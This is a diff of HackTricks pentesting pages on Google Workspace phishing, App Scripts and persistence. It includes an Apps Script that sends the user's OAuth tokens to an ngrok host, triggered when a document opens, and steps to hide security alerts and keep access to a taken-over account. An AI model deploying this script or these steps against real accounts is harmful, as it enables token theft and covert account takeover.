+
+If you have compromised some credentials or the session of the user check these options to maintain persistence over it:
+
+{{#ref}}
+gws-persistence.md
+{{#endref}}
+
+## Account Compromised Recovery
+
+- Log out of all sessions
+- Change user password
+- Generate new 2FA backup codes
+- Remove App passwords
+- Remove OAuth apps
+- Remove 2FA devices
+- Remove email forwarders
+- Remove emails filters
+- Remove recovery email/phones
+- Removed malicious synced smartphones
+- Remove bad Android Apps
+- Remove bad account delegations
+
+## References
+
+- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
similarity index 56%
rename from pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
rename to src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
index 29201100e..7877374d9 100644
--- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
+++ b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
@@ -1,23 +1,12 @@
 # GWS - Google Platforms Phishing
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 ## Generic Phishing Methodology
-{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology" %}
+{{#ref}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology
+{{#endref}}
 ## Google Groups Phishing
@@ -25,30 +14,28 @@ Apparently, by default, in workspace members [**can create groups**](https://gro
 It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
-
+
 ## Google Chat Phishing
 You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
-
+
-{% hint style="success" %}
-**In my testing however the invited members didn't even receive an invitation.**
-{% endhint %}
+> [!TIP]
+> **In my testing however the invited members didn't even receive an invitation.**
-You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s)
+You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s)
 ## Google Doc Phishing
 In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
 Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
-
+
-{% hint style="success" %}
-Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
-{% endhint %}
+> [!TIP]
+> Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
 ## Google Calendar Phishing
@@ -56,51 +43,48 @@ You can **create a calendar event** and add as many email address of the company
 This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
-
+
 To make it look less suspicious:
-* Set it up so that **receivers cannot see the other people invited**
-* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
-* Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
+- Set it up so that **receivers cannot see the other people invited**
+- Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
+- Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
 ## App Scripts Redirect Phishing
 It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**.\
 The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
-{% code overflow="wrap" %}
 ```javascript
 function doGet() {
- return HtmlService.createHtmlOutput('')
- .setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL);
+ return HtmlService.createHtmlOutput(
+ ''
+ ).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
 }
 ```
-{% endcode %}
-For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH\_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
+For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
-
+
-{% hint style="success" %}
-Note that a warning will appear as the content is loaded inside an iframe.
-{% endhint %}
+> [!TIP]
+> Note that a warning will appear as the content is loaded inside an iframe.
 ## App Scripts OAuth Phishing
 It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
-{% content-ref url="gws-app-scripts.md" %}
-[gws-app-scripts.md](gws-app-scripts.md)
-{% endcontent-ref %}
+{{#ref}}
+gws-app-scripts.md
+{{#endref}}
 ## OAuth Apps Phishing
 Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
-{% hint style="info" %}
-Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
-{% endhint %}
+> [!NOTE]
+> Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
 **Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
@@ -115,15 +99,15 @@ As it was mentioned, google will always present a **prompt to the user to accept
 This prompt appears in apps that:
-* Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
-* Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
+- Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
+- Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
 ### Interesting Scopes
 [**Here**](https://developers.google.com/identity/protocols/oauth2/scopes) you can find a list of all the Google OAuth scopes.
-* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
-* **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
+- **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
+- **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
 ### Create an OAuth App
@@ -131,11 +115,11 @@ This prompt appears in apps that:
 1. Go to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) and click on configure the consent screen.
 2. Then, you will be asked if the **user type** is **internal** (only for people in your org) or **external**. Select the one that suits your needs
- * Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
+ - Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
 3. Give a **name** to the app, a **support email** (note that you can set a googlegroup email to try to anonymize yourself a bit more), a **logo**, **authorized domains** and another **email** for **updates**.
 4. **Select** the **OAuth scopes**.
- * This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
- * Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
+ - This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
+ - Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
 5. **Add the test users.** As long as the status of the app is testing, only these users are going to be able to access the app so make sure to **add the email you are going to be phishing**.
 Now let's get **credentials for a web application** using the **previously created OAuth Client ID**:
@@ -143,10 +127,10 @@ Now let's get **credentials for a web application** using the **previously creat
 1. Go back to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), a different option will appear this time.
 2. Select to **create credentials for a Web application**
 3. Set needed **Javascript origins** and **redirect URIs**
- * You can set in both something like **`http://localhost:8000/callback`** for testing
+ - You can set in both something like **`http://localhost:8000/callback`** for testing
 4. Get your application **credentials**
-Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp\_oauth\_phishing\_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
+Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
 ```bash
 git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example
@@ -157,38 +141,25 @@ python3 app.py --client-id "" --client-secret ""
 Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
-
+
 The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
-{% content-ref url="../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md" %}
-[gcp-non-svc-persistance.md](../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md
+{{#endref}}
 #### Using `glcoud`
 It's possible to do something using gcloud instead of the web console, check:
-{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md" %}
-[gcp-clientauthconfig-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
+{{#endref}}
 ## References
-* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
-* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
new file mode 100644
index 000000000..f51006208
--- /dev/null
+++ b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
@@ -0,0 +1,235 @@
+# GWS - App Scripts
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Scripts
+
+App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
+They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
+
+### Create App Script
+
+There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
+
+
+
+Create a container-bound project from Google Docs, Sheets, or Slides
+
+1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
+2. Click **Extensions** > **Google Apps Script**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project
+
+To create a standalone project from Apps Script:
+
+1. Go to [`script.google.com`](https://script.google.com/).
+2. Click add **New Project**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project from Google Drive
+
+1. Open [Google Drive](https://drive.google.com/).
+2. Click **New** > **More** > **Google Apps Script**.
+
+
+
+
+
+Create a container-bound project from Google Forms
+
+1. Open a form in Google Forms.
+2. Click More more_vert > **Script editor**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+
+
+
+
+Create a standalone project using the clasp command line tool
+
+`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
+
+See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
+
+
+## App Script Scenario
+
+### Create Google Sheet with App Script
+
+Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
+
+### Leak token
+
+In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
+
+- **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
+- **Gmail**: To access gmail data
+- **Drive**: To access drive data
+- **Google Sheets API**: So it works with the trigger
+
+To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.**
+
+```javascript
+function getToken() {
+ var userEmail = Session.getActiveUser().getEmail()
+ var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
+ var oauthToken = ScriptApp.getOAuthToken()
+ var identityToken = ScriptApp.getIdentityToken()
+
+ // Data json
+ data = {
+ oauthToken: oauthToken,
+ identityToken: identityToken,
+ email: userEmail,
+ domain: domain,
+ }
+
+ // Send data
+ makePostRequest(data)
+
+ // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
+
+ // To ask for AdminDirectory permissions
+ var pageToken = ""
+ page = AdminDirectory.Users.list({
+ domain: domain, // Use the extracted domain
+ orderBy: "givenName",
+ maxResults: 100,
+ pageToken: pageToken,
+ })
+
+ // To ask for gmail permissions
+ var threads = GmailApp.getInboxThreads(0, 10)
+
+ // To ask for drive permissions
+ var files = DriveApp.getFiles()
+}
+
+function makePostRequest(data) {
+ var url = "http://5.tcp.eu.ngrok.io:12027"
+
+ var options = {
+ method: "post",
+ contentType: "application/json",
+ payload: JSON.stringify(data),
+ }
+
+ try {
+ UrlFetchApp.fetch(url, options)
+ } catch (e) {
+ Logger.log("Error making POST request: " +
e.toString())
+ }
+}
+```
+
+To capture the request you can just run:
+
+```bash
+ngrok tcp 4444
+nc -lv 4444 #macOS
+```
+
+Permissions requested to execute the App Script:
+
+
+
+> [!WARNING]
+> As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
+
+### Create Trigger
+
+Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
+
+Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
+
+### Sharing
+
+In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
+
+> [!TIP]
+> The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users.
+
+### Abusing Shared With Me documents
+
+> [!CAUTION]
+> If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
+>
+> A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
+
+> [!TIP]
+> If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
+
+### Copying instead of sharing
+
+When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
+If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
+
+
+
+If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
+
+### Sharing as Web Application
+
+Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
+
+
+
+Followed by the **typical OAuth prompt asking** for the needed permissions.
+
+### Testing
+
+You can test a gathered token to list emails with:
+
+```bash
+curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \
+-H "Authorization: Bearer "
+```
+
+List calendar of the user:
+
+```bash
+curl -H "Authorization: Bearer $OAUTH_TOKEN" \
+ -H "Accept: application/json" \
+ "https://www.googleapis.com/calendar/v3/users/me/calendarList"
+```
+
+## App Script as Persistence
+
+One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.**
+
+It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
+
+Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
+
+
+
+> [!CAUTION]
+> This will create a security alert email and a push message to your mobile alerting about this.
+
+### Shared Document Unverified Prompt Bypass
+
+Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
+
+> [!WARNING]
+> This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
+>
+> This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
+
+> [!CAUTION]
+> This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
+> To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags).
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/workspace-security/gws-persistence.md b/src/pentesting-cloud/workspace-security/gws-persistence.md
new file mode 100644
index 000000000..3dd28ae67
--- /dev/null
+++ b/src/pentesting-cloud/workspace-security/gws-persistence.md
@@ -0,0 +1,182 @@ +# GWS - Persistence + +{{#include ../../banners/hacktricks-training.md}} + +> [!CAUTION] +> All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account. + +## **Persistence in Gmail** + +- You can create **filters to hide** security notifications from Google + - `from: (no-reply@accounts.google.com) "Security Alert"` + - This will prevent security emails to reach the email (but won't prevent push notifications to the mobile) + +
+ +Steps to create a gmail filter + +(Instructions from [**here**](https://support.google.com/mail/answer/6579)) + +1. Open [Gmail](https://mail.google.com/). +2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) . +3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**. +4. At the bottom of the search window, click **Create filter**. +5. Choose what you’d like the filter to do. +6. Click **Create filter**. + +Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters) + +
+ +
+ +- Create **forwarding address to forward sensitive information** (or everything) - You need manual access. + - Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop) + - The receiving address will need to confirm this + - Then, set to forward all the emails while keeping a copy (remember to click on save changes): + +
+ +It's also possible create filters and forward only specific emails to the other email address. + +## App passwords + +If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.** + +**Even if you have an open session you will need to know the password of the user to create an app password.** + +> [!NOTE] +> App passwords can **only be used with accounts that have 2-Step Verification** turned on. + +## Change 2-FA and similar + +It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\ +**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).** + +> [!CAUTION] +> To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here. +> +> It's also possible to **locate the device.** + +**Even if you have an open session you will need to know the password of the user to change these settings.** + +## Persistence via OAuth Apps + +If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. 
The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\ +It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. + +Check the following page for more information about OAuth Apps: + +{{#ref}} +gws-google-platforms-phishing/ +{{#endref}} + +## Persistence via delegation + +You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled). + +
+ +If you are a Workspace admin check this to enable the feature + +(Information [copied form the docs](https://support.google.com/a/answer/7223765)) + +As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can: + +- Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf. +- Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account. + +Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit. + +#### Delegation limits & restrictions + +- **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account. +- With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number. +- Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently. +- A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit. +- Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609). 
+ +#### Step 1: Turn on Gmail delegation for your users + +**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584). + +1. [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076). + + Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com + +2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**. +3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584). +4. Click **Mail delegation**. +5. Check the **Let users delegate access to their mailbox to other users in the domain** box. +6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box. +7. Select an option for the default sender information that's included in messages sent by delegates: + - **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate. + - **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included. +8. 
(Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box. +9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings. +10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 3–9. + +Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107) + +#### Step 2: Have users set up delegates for their accounts + +After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user. + +For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350). + +
+ +
+ +From a regular suer, check here the instructions to try to delegate your access + +(Info copied [**from the docs**](https://support.google.com/mail/answer/138350)) + +You can add up to 10 delegates. + +If you're using Gmail through your work, school, or other organization: + +- You can add up to 1000 delegates within your organization. +- With typical use, 40 delegates can access a Gmail account at the same time. +- If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time. + +1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app. +2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**. +3. Click the **Accounts and Import** or **Accounts** tab. +4. In the "Grant access to your account" section, click **Add another account**. If you’re using Gmail through your work or school, your organization may restrict email delegation. If you don’t see this setting, contact your admin. + - If you don't see Grant access to your account, then it's restricted. +5. Enter the email address of the person you want to add. If you’re using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\ + \ + **Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in. + + - [Learn how an Admin can create a user](https://support.google.com/a/answer/33310). 
+ - [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319). + + 6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**. + + The person you added will get an email asking them to confirm. The invitation expires after a week. + + If you added a group, all group members will become delegates without having to confirm. + + Note: It may take up to 24 hours for the delegation to start taking effect. + +
+ +## Persistence via Android App + +If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone. + +## **Persistence via** App Scripts + +You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check: + +{{#ref}} +gws-google-platforms-phishing/gws-app-scripts.md +{{#endref}} + +## References + +- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic +- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/workspace-security/gws-post-exploitation.md b/src/pentesting-cloud/workspace-security/gws-post-exploitation.md similarity index 56% rename from pentesting-cloud/workspace-security/gws-post-exploitation.md rename to src/pentesting-cloud/workspace-security/gws-post-exploitation.md index a1a3cf4a1..411fcca77 100644 --- a/pentesting-cloud/workspace-security/gws-post-exploitation.md +++ b/src/pentesting-cloud/workspace-security/gws-post-exploitation.md @@ -1,19 +1,6 @@ # GWS - Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
